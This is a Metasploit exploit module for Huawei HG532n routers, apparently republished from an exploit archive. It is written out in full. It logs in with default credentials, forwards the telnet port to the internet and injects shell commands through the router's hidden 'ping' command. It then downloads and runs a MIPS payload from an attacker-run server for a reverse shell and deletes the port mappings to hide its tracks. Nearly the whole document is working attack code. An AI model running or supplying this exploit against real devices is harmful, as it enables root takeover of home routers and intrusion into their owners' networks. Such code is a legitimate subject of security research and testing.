Huawei HG532n Command Injection

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'base64'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'Huawei HG532n Command Injection',  
'Description' => %q(  
This module exploits a command injection vulnerability in the Huawei  
HG532n routers provided by TE-Data Egypt, leading to a root shell.  
  
The router's web interface has two kinds of logins, a "limited" user:user  
login given to all customers and an admin mode. The limited mode is used  
here to expose the router's telnet port to the outside world through NAT  
port-forwarding.  
  
With telnet now remotely accessible, the router's limited "ATP command  
line tool" (served over telnet) can be upgraded to a root shell through  
an injection into the ATP's hidden "ping" command.  
),  
'Author' =>  
[  
'Ahmed S. Darwish <[email protected]>', # Vulnerability discovery, msf module  
],  
'License' => MSF_LICENSE,  
'Platform' => ['linux'],  
'Arch' => ARCH_MIPSBE,  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'linux/mipsbe/mettle_reverse_tcp'  
},  
'Targets' =>  
[  
[  
'Linux mipsbe Payload',  
{  
'Arch' => ARCH_MIPSBE,  
'Platform' => 'linux'  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 15 2017'  
))  
register_options(  
[  
OptString.new('HttpUsername', [false, 'Valid web-interface user-mode username', 'user']),  
OptString.new('HttpPassword', [false, 'Web-interface username password', 'user']),  
OptString.new('TelnetUsername', [false, 'Valid router telnet username', 'admin']),  
OptString.new('TelnetPassword', [false, 'Telnet username password', 'admin']),  
OptAddress.new('DOWNHOST', [false, 'Alternative host to request the MIPS payload from']),  
OptString.new('DOWNFILE', [false, 'Filename to download, (default: random)']),  
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit to connect back", 60])  
], self.class  
)  
end  
  
def check  
httpd_fingerprint = %r{  
\A  
HTTP\/1\.1\s200\sOK\r\n  
CACHE-CONTROL:\sno-cache\r\n  
Date:\s.*\r\n  
Connection:\sKeep-Alive\r\n  
Content-Type:\stext\/html\r\n  
Content-Length:\s\d+\r\n  
\r\n  
<html>\n<head>\n  
<META\shttp-equiv="Content-Type"\scontent="text\/html;\scharset=UTF-8">\r\n  
<META\shttp-equiv="Pragma"\scontent="no-cache">\n  
<META\shttp-equiv="expires"\sCONTENT="-1">\n  
<link\srel="icon"\stype="image\/icon"\shref="\/favicon.ico"\/>  
}x  
  
begin  
res = send_request_raw(  
'method' => 'GET',  
'uri' => '/'  
)  
rescue ::Rex::ConnectionError  
print_error("#{rhost}:#{rport} - Could not connect to device")  
return Exploit::CheckCode::Unknown  
end  
  
if res && res.code == 200 && res.to_s =~ httpd_fingerprint  
return Exploit::CheckCode::Appears  
end  
  
Exploit::CheckCode::Unknown  
end  
  
#  
# The Javascript code sends all passwords in the form:  
# form.setAction('/index/login.cgi');  
# form.addParameter('Username', Username.value);  
# form.addParameter('Password', base64encode(SHA256(Password.value)));  
# Do the same base64 encoding and SHA-256 hashing here.  
#  
def hash_password(password)  
sha256 = OpenSSL::Digest::SHA256.hexdigest(password)  
Base64.encode64(sha256).gsub(/\s+/, "")  
end  
  
#  
# Without below cookies, which are also sent by the JS code, the  
# server will consider even correct HTTP requests invalid  
#  
def generate_web_cookie(admin: false, session: nil)  
if admin  
cookie = 'FirstMenu=Admin_0; '  
cookie << 'SecondMenu=Admin_0_0; '  
cookie << 'ThirdMenu=Admin_0_0_0; '  
else  
cookie = 'FirstMenu=User_2; '  
cookie << 'SecondMenu=User_2_1; '  
cookie << 'ThirdMenu=User_2_1_0; '  
end  
  
cookie << 'Language=en'  
cookie << "; #{session}" unless session.nil?  
cookie  
end  
  
#  
# Login to the router through its JS-based login page. Upon a successful  
# login, return the keep-alive HTTP session cookie  
#  
def web_login  
cookie = generate_web_cookie(admin: true)  
  
# On good passwords, the router redirect us to the /html/content.asp  
# homepage. Otherwise, it throws us back to the '/' login page. Thus  
# consider the ASP page our valid login marker  
invalid_login_marker = "var pageName = '/'"  
valid_login_marker = "var pageName = '/html/content.asp'"  
  
username = datastore['HttpUsername']  
password = datastore['HttpPassword']  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => '/index/login.cgi',  
'cookie' => cookie,  
'vars_post' => {  
'Username' => username,  
'Password' => hash_password(password)  
}  
)  
fail_with(Failure::Unreachable, "Connection timed out") if res.nil?  
  
unless res.code == 200  
fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}")  
end  
  
return res.get_cookies if res.body.include? valid_login_marker  
  
if res.body.include? invalid_login_marker  
fail_with(Failure::NoAccess, "Invalid web interface credentials #{username}:#{password}")  
else  
fail_with(Failure::UnexpectedReply, "Neither valid or invalid login markers received")  
end  
end  
  
#  
# The telnet port is filtered by default. Expose it to the outside world  
# through NAT forwarding  
#  
def expose_telnet_port(session_cookies)  
cookie = generate_web_cookie(session: session_cookies)  
  
external_telnet_port = rand(32767) + 32768  
  
portmapping_page = '/html/application/portmapping.asp'  
valid_port_export_marker = "var pageName = '#{portmapping_page}';"  
invalid_port_export_marker = /var ErrInfo = \d+/  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => '/html/application/addcfg.cgi',  
'cookie' => cookie,  
'headers' => { 'Referer' => "http://#{rhost}#{portmapping_page}" },  
'vars_get' => {  
'x' => 'InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping',  
'RequestFile' => portmapping_page  
},  
'vars_post' => {  
'x.PortMappingProtocol' => "TCP",  
'x.PortMappingEnabled' => "1",  
'x.RemoteHost' => "",  
'x.ExternalPort' => external_telnet_port.to_s,  
'x.ExternalPortEndRange' => external_telnet_port.to_s,  
'x.InternalClient' => "192.168.1.1",  
'x.InternalPort' => "23",  
'x.PortMappingDescription' => Rex::Text.rand_text_alpha(10) # Minimize any possible conflict  
}  
)  
fail_with(Failure::Unreachable, "Connection timed out") if res.nil?  
  
unless res.code == 200  
fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}")  
end  
  
if res.body.include? valid_port_export_marker  
print_good "Telnet port forwarding succeeded; exposed telnet port = #{external_telnet_port}"  
return external_telnet_port  
end  
  
if res.body.match? invalid_port_export_marker  
fail_with(Failure::Unknown, "Router reported port-mapping error. " \  
"A port-forwarding entry with same external port (#{external_telnet_port}) already exist?")  
end  
  
fail_with(Failure::UnexpectedReply, "Port-forwarding failed: neither valid or invalid markers received")  
end  
  
#  
# Cover our tracks; don't leave the exposed router's telnet port open  
#  
def hide_exposed_telnet_port(session_cookies)  
cookie = generate_web_cookie(session: session_cookies)  
portmapping_page = '/html/application/portmapping.asp'  
  
# Gather a list of all existing ports forwarded so we can purge them soon  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => portmapping_page,  
'cookie' => cookie  
)  
  
unless res && res.code == 200  
print_warning "Could not get current forwarded ports from web interface"  
end  
  
# Collect existing port-forwarding keys; to be passed to the delete POST request  
portforward_key = /InternetGatewayDevice\.WANDevice\.1\.WANConnectionDevice\.1\.WANPPPConnection\.1\.PortMapping\.\d+/  
vars_post = {}  
res.body.scan(portforward_key).uniq.each do |key|  
vars_post[key] = ""  
end  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => '/html/application/del.cgi',  
'cookie' => cookie,  
'headers' => { 'Referer' => "http://#{rhost}#{portmapping_page}" },  
'vars_get' => { 'RequestFile' => portmapping_page },  
'vars_post' => vars_post  
)  
return if res && res.code == 200  
  
print_warning "Could not re-hide exposed telnet port"  
end  
  
#  
# Cleanup our state, after any successful web login. Note: router refuses  
# more than 3 concurrent logins from the same IP. It also forces a 1-minute  
# delay after 3 unsuccessful logins from _any_ IP.  
#  
def web_logout(session_cookies)  
cookie = generate_web_cookie(admin: true, session: session_cookies)  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => '/index/logout.cgi',  
'cookie' => cookie,  
'headers' => { 'Referer' => "http://#{rhost}/html/main/logo.html" }  
)  
return if res && res.code == 200  
  
print_warning "Could not logout from web interface. Future web logins may fail!"  
end  
  
#  
# Don't leave web sessions idle for too long (> 1 second). It triggers the  
# HTTP server's safety mechanisms and make it refuse further operations.  
#  
# Thus do all desired web operations in chunks: log in, do our stuff (passed  
# block), and immediately log out. The router's own javescript code handles  
# this by sending a refresh request every second.  
#  
def web_operation  
begin  
cookie = web_login  
yield cookie  
ensure  
web_logout(cookie) unless cookie.nil?  
end  
end  
  
#  
# Helper method. Used for waiting on telnet banners and prompts.  
# Always catch the ::Timeout::Error exception upon calling this.  
#  
def read_until(sock, timeout, marker)  
received = ''  
Timeout.timeout(timeout) do  
loop do  
r = (sock.get_once(-1, 1) || '')  
next if r.empty?  
  
received << r  
print_status "Received new reply token = '#{r.strip}'" if datastore['VERBOSE'] == true  
return received if received.include? marker  
end  
end  
end  
  
#  
# Borrowing constants from Ruby's Net::Telnet class (ruby license)  
#  
IAC = 255.chr # "\377" # "\xff" # interpret as command  
DO = 253.chr # "\375" # "\xfd" # please, you use option  
OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission  
OPT_ECHO = 1.chr # "\001" # "\x01" # Echo  
OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead  
OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition  
  
def telnet_auth_negotiation(sock, timeout)  
begin  
read_until(sock, timeout, 'Password:')  
sock.write(IAC + DO + OPT_ECHO + IAC + DO + OPT_SGA)  
rescue ::Timeout::Error  
fail_with(Failure::UnexpectedReply, "Expected first password banner not received")  
end  
  
begin  
read_until(sock, timeout, 'Password:') # Router bug  
sock.write(datastore['TelnetPassword'] + OPT_NAOFFD + OPT_BINARY)  
rescue ::Timeout::Error  
fail_with(Failure::UnexpectedReply, "Expected second password banner not received")  
end  
end  
  
def telnet_prompt_wait(error_regex = nil)  
begin  
result = read_until(@telnet_sock, @telnet_timeout, @telnet_prompt)  
if error_regex  
error_regex = [error_regex] unless error_regex.is_a? Array  
error_regex.each do |regex|  
if result.match? regex  
fail_with(Failure::UnexpectedReply, "Error expression #{regex} included in reply")  
end  
end  
end  
rescue ::Timeout::Error  
fail_with(Failure::UnexpectedReply, "Expected telnet prompt '#{@telnet_prompt}' not received")  
end  
end  
  
#  
# Basic telnet login. Due to mixins conflict, revert to using plain  
# Rex sockets (thanks @hdm!)  
#  
def telnet_login(port)  
print_status "Connecting to just-exposed telnet port #{port}"  
  
@telnet_prompt = 'HG520b>'  
@telnet_timeout = 60  
  
@telnet_sock = Rex::Socket.create_tcp(  
'PeerHost' => rhost,  
'PeerPort' => port,  
'Context' => { 'Msf' => framework, 'MsfExploit' => self },  
'Timeout' => @telnet_timeout  
)  
if @telnet_sock.nil?  
fail_with(Failure::Unreachable, "Exposed telnet port unreachable")  
end  
add_socket(@telnet_sock)  
  
print_good "Connection succeeded. Passing telnet credentials"  
telnet_auth_negotiation(@telnet_sock, @telnet_timeout)  
  
print_good "Credentials passed; waiting for prompt '#{@telnet_prompt}'"  
telnet_prompt_wait  
  
print_good 'Prompt received. Telnet access fully granted!'  
end  
  
def telnet_exit  
return if @telnet_sock.nil?  
@telnet_sock.write('exit' + OPT_NAOFFD + OPT_BINARY)  
end  
  
#  
# Router's limited ATP shell just reverts to classical Linux  
# shell when executing a ping:  
#  
# "ping %s > /var/res_ping"  
#  
# A successful injection would thus substitute all its spaces to  
# ${IFS}, and trails itself with ";true" so it can have its own  
# IO redirection.  
#  
def execute_command(command, error_regex = nil, background: false)  
print_status "Running command on target: #{command}"  
  
command.gsub!(/\s/, '${IFS}')  
separator = background ? '&' : ';'  
atp_cmd = "ping ?;#{command}#{separator}true"  
  
@telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)  
telnet_prompt_wait(error_regex)  
print_good "Command executed successfully"  
end  
  
#  
# Our own HTTP server, for serving the payload  
#  
def start_http_server  
@pl = generate_payload_exe  
  
downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))  
resource_uri = '/' + downfile  
  
if datastore['DOWNHOST']  
print_status "Will not start local web server, as DOWNHOST is already defined"  
else  
print_status("Starting web server; hosting #{resource_uri}")  
start_service(  
'ServerHost' => '0.0.0.0',  
'Uri' => {  
'Proc' => proc { |cli, req| on_request_uri(cli, req) },  
'Path' => resource_uri  
}  
)  
end  
  
resource_uri  
end  
  
#  
# HTTP server incoming request callback  
#  
def on_request_uri(cli, _request)  
print_good "HTTP server received request. Sending payload to victim"  
send_response(cli, @pl)  
end  
  
#  
# Unfortunately we could not use the `echo' command stager since  
# the router's busybox echo does not understand the necessary  
# "-en" options. It outputs them to the binary instead.  
#  
# We could not also use the `wget' command stager, as Huawei  
# crafted their own implementation with much different params.  
#  
def download_and_run_payload(payload_uri)  
srv_host =  
if datastore['DOWNHOST']  
datastore['DOWNHOST']  
elsif datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"  
Rex::Socket.source_address(rhost)  
else  
datastore['SRVHOST']  
end  
  
srv_port = datastore['SRVPORT'].to_s  
output_file = "/tmp/#{rand_text_alpha_lower(8)}"  
  
# Check module documentation for the special wget syntax  
wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"  
  
execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.  
execute_command("chmod 700 #{output_file}", /No such file/)  
execute_command(output_file, /not found/, background: true)  
execute_command("rm #{output_file}", /No such file/)  
end  
  
#  
# At the end of the module, especially for reverse_tcp payloads, wait for  
# the payload to connect back to us. There's a very high probability we  
# will lose the payload's signal otherwise.  
#  
def wait_for_payload_session  
print_status "Waiting for the payload to connect back .."  
begin  
Timeout.timeout(datastore['ListenerTimeout']) do  
loop do  
break if session_created?  
Rex.sleep(0.25)  
end  
end  
rescue ::Timeout::Error  
fail_with(Failure::Unknown, "Timeout waiting for payload to start/connect-back")  
end  
print_good "Payload connected!"  
end  
  
#  
# Main exploit code: login through web interface; port-forward router's  
# telnet; access telnet and gain root shell through command injection.  
#  
def exploit  
print_status "Validating router's HTTP server (#{rhost}:#{rport}) signature"  
unless check == Exploit::CheckCode::Appears  
fail_with(Failure::Unknown, "Unable to validate device fingerprint. Is it an HG532n?")  
end  
  
print_good "Good. Router seems to be a vulnerable HG532n device"  
  
telnet_port = nil  
web_operation do |cookie|  
telnet_port = expose_telnet_port(cookie)  
end  
  
begin  
telnet_login(telnet_port)  
payload_uri = start_http_server  
download_and_run_payload(payload_uri)  
wait_for_payload_session  
ensure  
telnet_exit  
web_operation do |cookie|  
hide_exposed_telnet_port(cookie)  
end  
end  
end  
end  
`